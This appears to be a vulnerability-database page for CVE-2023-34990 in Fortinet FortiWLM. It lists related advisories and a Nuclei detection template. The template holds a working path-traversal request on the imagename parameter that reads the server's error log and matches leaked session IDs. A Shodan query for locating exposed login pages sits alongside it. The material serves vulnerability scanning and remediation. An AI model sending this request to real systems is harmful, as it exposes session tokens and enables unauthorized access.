| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| The vulnerability of the imagename handler in the CGI script /ems/cgi-bin/ezrf-lighttpd.cgi of the graphical interface for managing WLAN access points and LAN switches in Fortinet FortiWLM allows a attacker to execute arbitrary code. | 20 Dec 202400:00 | – | bdu_fstec | |
| CVE-2023-34990 | 18 Dec 202412:48 | – | circl | |
| Fortinet FortiWLM 代码注入漏洞 | 18 Dec 202400:00 | – | cnnvd | |
| Fortinet FortiWLM Path Traversal Vulnerability (CNVD-2024-4963848) | 25 Dec 202400:00 | – | cnvd | |
| CVE-2023-34990 | 18 Dec 202412:44 | – | cve | |
| CVE-2023-34990 | 18 Dec 202412:44 | – | cvelist | |
| Vulnerability fixed in Fortinet FortiWLM | 19 Dec 202414:53 | – | ncsc | |
| CVE-2023-34990 | 18 Dec 202413:15 | – | nvd | |
| CVE-2023-34990 | 18 Dec 202413:15 | – | osv | |
| PT-2024-9675 | 18 Dec 202400:00 | – | ptsecurity |
| Source | Link |
|---|---|
| fortiguard | www.fortiguard.com/psirt/FG-IR-23-144 |
id: CVE-2023-34990
info:
name: FortiWLM - Directory Traversal
author: DhiyaneshDk
severity: critical
description: |
A relative path traversal in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specially crafted web requests.
impact: |
Unauthenticated attackers can exploit path traversal through the imagename parameter in ezrf_lighttpd.cgi to read arbitrary files and potentially execute unauthorized code, compromising the entire Fortinet FortiWLM wireless LAN management system.
remediation: |
Update Fortinet FortiWLM to version 8.6.6 or 8.5.5 or later that validates file paths in ezrf_lighttpd.cgi and prevents directory traversal attacks.
reference:
- https://fortiguard.com/psirt/FG-IR-23-144
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-34990
cwe-id: CWE-94,CWE-23
epss-score: 0.24901
epss-percentile: 0.97647
metadata:
max-request: 1
shodan-query: title:"FortiWLM Login"
tags: cve,cve2023,fortiwlm,lfi,cisa,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /wlm/login?next=/wlm HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
internal: true
dsl:
- 'status_code == 200'
- 'contains(body, "<title>FortiWLM Login</title>")'
condition: and
- raw:
- |
GET /ems/cgi-bin/ezrf_lighttpd.cgi?op_type=upgradelogs&imagename=../../../../../../../../../data/apps/nms/logs/httpd_error_log HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: response
regex:
- 'sessionid=([A-F0-9]+)'
- type: status
status:
- 200
# digest: 490a004630440220501140f8087a031f7e2d1beeb5d1e557b319bd74f506a3616ef03b8cb5e81b4e02204abd1c267e6c1d6c2e2ba3e5e28e6f71307cd5e7e68a3448ebe63900cc8198df:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation